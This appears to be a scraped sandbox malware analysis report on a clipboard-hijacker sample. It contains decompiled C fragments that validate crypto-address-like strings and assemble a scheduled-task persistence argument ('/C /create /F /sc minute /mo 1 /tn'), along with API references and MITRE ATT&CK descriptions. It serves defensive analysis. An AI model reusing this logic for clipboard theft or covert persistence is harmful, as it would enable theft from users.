						if(_t4 == 0x41 || _t4 == 0x42 || _t4 == _t12 || _t4 == 0x31 || _t4 == 0x32 || _t4 == 0x33 || _t4 == 0x34 || _t4 == 0x35 || _t4 == 0x36 || _t4 == 0x37 || _t4 == _t11 || _t4 == 0x39) {
							_t14 = _t13 + 4;
							if(StrChrW(_t14, _t12) != 0 || StrChrW(_t14, 0x4f) != 0 || StrChrW(_t14, 0x49) != 0) {
								goto L19;
							} else {
								_t8 = StrChrW(_t14, 0x6c);
								if(_t8 != 0) {
									goto L19;
								} else {
									return  &(_t8[0]);
								}
							}
						} else {
							goto L19;
						}
					}
				}
			}

0x004015ea
0x004015f6
0x00401680
0x00401683
0x004015fc
0x004015fe
0x00401602
0x00000000
0x00401604
0x00401604
0x0040160a
0x0040160e
0x00401648
0x00401654
0x00000000
0x00401670
0x00401673
0x0040167b
0x00000000
0x0040167d
0x0040167f
0x0040167f
0x0040167b
0x00000000
0x00000000
0x00000000
0x0040160e
0x00401602

APIs

lstrlenW.KERNEL32(?,?,00401B24,?,00402163), ref: 004015ED
StrChrW.SHLWAPI(?,00000030,?,00402163), ref: 0040164C
StrChrW.SHLWAPI(?,0000004F,?,00402163), ref: 00401659
StrChrW.SHLWAPI(?,00000049,?,00402163), ref: 00401666
StrChrW.SHLWAPI(?,0000006C,?,00402163), ref: 00401673

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
Instruction ID: 3e9ba84da349abec412b177751d0e179ec05f8f4c812e93d197d81d4f79ec5ec
Opcode Fuzzy Hash: 3e839589a52552755556ab8f22701c2fd0b2083a19dd4434fe127b2f866be211
Instruction Fuzzy Hash: 65014CA114116117DB342E286C88A7B325D5B53790B1E4D37FA45F42F0D33FDD86598E

Uniqueness

Uniqueness Score: -1.00%

Function 00402230, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402230(WCHAR** __ecx, WCHAR* __edx) {
				signed int _v8;
				WCHAR* _v12;
				signed int _t10;
				WCHAR* _t20;
				void* _t21;
				int _t30;
				signed int _t31;
				void** _t34;

				_push(__ecx);
				_push(__ecx);
				_t34 = __ecx;
				_t20 = __edx;
				_v12 = __edx;
				if( *__ecx == 0) {
					_t30 = 0;
				} else {
					_t30 = lstrlenW( *__ecx);
				}
				_t10 = lstrlenW(_t20) + 1 + _t30;
				_v8 = _t10;
				_t21 = LocalAlloc(0x40, _t10 + _t10);
				_t31 = _v8;
				if(_t30 != 0) {
					E00401418(_t21, _t31,  *_t34);
				}
				if( *_t34 != 0) {
					GlobalFree( *_t34);
				}
				E0040219A(_t21, _t31, _v12);
				 *_t34 = _t21;
				 *((short*)(_t21 + _t31 * 2 - 2)) = 0;
				return 1;
			}

0x00402233
0x00402234
0x00402237
0x00402239
0x0040223c
0x00402242
0x00402250
0x00402244
0x0040224c
0x0040224c
0x0040225a
0x0040225c
0x0040226c
0x0040226e
0x00402271
0x00402279
0x00402279
0x00402281
0x00402285
0x00402285
0x00402292
0x00402299
0x0040229b
0x004022a5

APIs

lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00402246
lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00402253
LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00402264
GlobalFree.KERNEL32 ref: 00402285

Strings

/C /create /F /sc minute /mo 1 /tn ", xrefs: 00402252

Memory Dump Source

Source File: 00000011.00000002.526837252.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$AllocFreeGlobalLocal
String ID: /C /create /F /sc minute /mo 1 /tn "
API String ID: 3873415381-4285889591
Opcode ID: 72bfcd3077b21f1446062c52c20ece7f535875c6e2425e4305ca62285ad8d2e4
Instruction ID: af5ef97b17a61ce9545709a8689a814e0938973f1b89e85d1da4918992f5abef
Opcode Fuzzy Hash: 72bfcd3077b21f1446062c52c20ece7f535875c6e2425e4305ca62285ad8d2e4
Instruction Fuzzy Hash: 5C017171600205EFD7105FA9DD49B5ABAFAEFC8311F14447EE682F32A1DAB89C418664

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report hTu8FeYy28.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Clipboard Hijacker

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

Function 00401000, Relevance: 131.4, APIs: 37, Strings: 38, Instructions: 159
libraryloaderCOMMON

Function 00401272, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 58
fileCOMMON

Function 0040202B, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 119
stringmemorysleepCOMMON

Function 00401339, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82
processmemorysynchronizationCOMMON

Function 00401339, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82
processsynchronizationCOMMON

Function 00401272, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58
fileCOMMON

Function 0040202B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119
sleepsynchronizationCOMMON

Function 00401F8B, Relevance: 13.5, APIs: 9, Instructions: 36
clipboardmemoryCOMMON

Function 00401FEF, Relevance: 7.5, APIs: 5, Instructions: 24
clipboardCOMMON

Function 00401542, Relevance: 9.1, APIs: 6, Instructions: 68
stringCOMMON

Function 00401684, Relevance: 7.6, APIs: 5, Instructions: 87
stringCOMMON

Function 004015E9, Relevance: 7.6, APIs: 5, Instructions: 64
stringCOMMON

Function 00402230, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51
stringmemoryCOMMON